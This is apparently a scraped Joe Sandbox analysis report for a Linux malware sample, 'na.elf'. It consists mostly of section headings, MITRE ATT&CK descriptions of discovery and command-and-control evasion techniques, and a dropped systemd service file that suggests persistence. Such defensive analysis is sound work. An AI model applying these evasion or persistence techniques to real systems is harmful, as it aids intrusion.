Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report na.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/etc/systemd/system/sbolo.service

/memfd:snapd-env-generator (deleted)

/tmp/qemu-open.NkVkgH (deleted)

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

System Behavior

Analysis Process: na.elf PID: 5691, Parent PID: 5617

General

Chronological Activities

Analysis Process: na.elf PID: 5693, Parent PID: 5691

General

Chronological Activities

Analysis Process: na.elf PID: 5695, Parent PID: 5691

General

Chronological Activities

Analysis Process: sh PID: 5695, Parent PID: 5691

General

Chronological Activities

Linux Analysis Report
na.elf